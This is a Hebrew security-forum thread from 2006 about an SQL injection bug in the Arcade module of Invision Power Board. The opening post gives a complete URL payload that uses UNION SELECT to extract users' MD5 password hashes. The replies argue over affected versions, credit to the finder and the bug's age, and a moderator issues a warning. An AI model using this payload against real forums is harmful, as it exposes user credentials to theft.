ראשי > אבטחת מידע > IPB Sql Injection Arcade - באג במשחקייה
09/06/2006 19:32:11
Pr0T3cT10n
SQL Injection במוד משחקייה במערכת IPB, Invision Board. הבאג מאפשר לחשוף מידע של משתמשים כגון ה Hash, סיסמת המשתמש המוצפנת ב MD5. ניצול הבאג: קוד: index.php?act=Arcade&module=report&user=-1%20UNION%20SELECT%20password%20FROM%20ibf_members%20WHERE%20id=
הבאג נמצא בדירוג של המשתמש במשחקייה.
הבאג נמצא ע"י: B-HFH[ההודעה נערכה על-ידי Pr0T3cT10n ב-10/06/2006 23:51:38]
09/06/2006 19:35:57
dracula
נחמד מאוד. תודה על המידע
09/06/2006 19:37:33
Zibi
יש שם מיליונים כאלה. אבל בכל זאת תודה.
09/06/2006 19:38:52
Pr0T3cT10n
בבקשה..תהנו..אבל אל תשכחו שזה רק למטרות לימוד.
09/06/2006 19:46:32
dracula
תגיד Pr0T3cT10n יש לך איסיקיו?
09/06/2006 19:53:17
tal
שכחת לומר לאיזו גירסא זאת ומתי הבאג עצמו יצא (שני פרמטרים מאוד חשובים)...
09/06/2006 20:54:06
Pr0T3cT10n
גירסה? תבדוק על גירסה שאתה רוצה. אני חושב שזה פועל על כולם אם אני לא טועה, ובקשר לדרקולה, כן יש לי ICQ. 233408
09/06/2006 21:32:27
V[i]RuS
פרוטקשין.. אני הייתי מציע לעשות את זה POC.. עדיף שתוריד את הסטרינג שמחזיר את הסיסמא..
10/06/2006 10:29:35
SkOd
http://www.sed-team.be/?id=1 ....
10/06/2006 11:10:16
Pr0T3cT10n
SkOd אני לא הבאתי שום דבר ששונה מהכתוב שם. אני מניח שיש פה משתמשים שלא מכירים את האתר, ולא מכירים את הבאג. יום טוב.
10/06/2006 12:07:57
Sin
תודה רבה על הבאג XDDD פעם הבאה תיתן קרדיט
יום טוב
10/06/2006 12:40:39
the hell
מוכר מאוד להבא שים קרדיט בכל מקרה תודה[ההודעה נערכה על-ידי the hell ב-10/06/2006 12:41:55]
10/06/2006 14:37:19
tal
ציטוט:גירסה? תבדוק על גירסה שאתה רוצה. אני חושב שזה פועל על כולם אם אני לא טועה, ובקשר לדרקולה, כן יש לי ICQ. 233408
"עובד על כולם" זה עניין מאוד זמני... אני מניח שבקרוב יוציאו לזה תיקון בגירסא חדשה...
10/06/2006 14:50:11
Pr0T3cT10n
אנ חושב שכבר יצא, אם לא אז יש כאלו שיודעים איך לתקן זאת ותיקנו בעצמם.
10/06/2006 21:27:11
sysctl
זה חור ישן שגילו בערך לפני שנה אז דיי לזיין את השכל...
10/06/2006 21:59:48
B-HFH
מה הקטע בלכתוב פה סיקור על באג שנמצא לפני אממ מזמן? אגב זה באג שמצאתי אז לפחות קרדיט... אם כבר אתה מסקר על באגים , תחפש קצת יותר חדשים.[ההודעה נערכה על-ידי B-HFH ב-10/06/2006 22:00:26]
10/06/2006 23:51:17
Pr0T3cT10n
שמע B-HFH אני לא ידעתי שמצאת אותו, ראיתי אותו בכמה אתרים...לא בהרבה..אז לא ידעתי אם זה אתה. אם זה באמת אתה אז בכיף אני יערוך תהודעה.
11/06/2006 00:56:40
Trancer
Pr0T3cT10n, כבר הזהרתי אותך בפרטי, עכשיו אני יזהיר פה.
מאז שהגעת כמעט ולא היה פוסט שלא גרר ריבים / קללות / ויכוחים ועכשיו אי מתן קרדיט.
שים לב שעברת על כמה וכמה חוקים וזה לאחר שכבר פעמיים דיברתי איתך בפרטי והצעתי עזרה, בפרטי ובאיי סי קיו.
זאת פעם אחרונה. תתחיל לחשוב טוב טוב לפני שאתה פותח טופיק לפני שאני יתחיל לחשוב על דרכים חריגות לטפל בנושא.
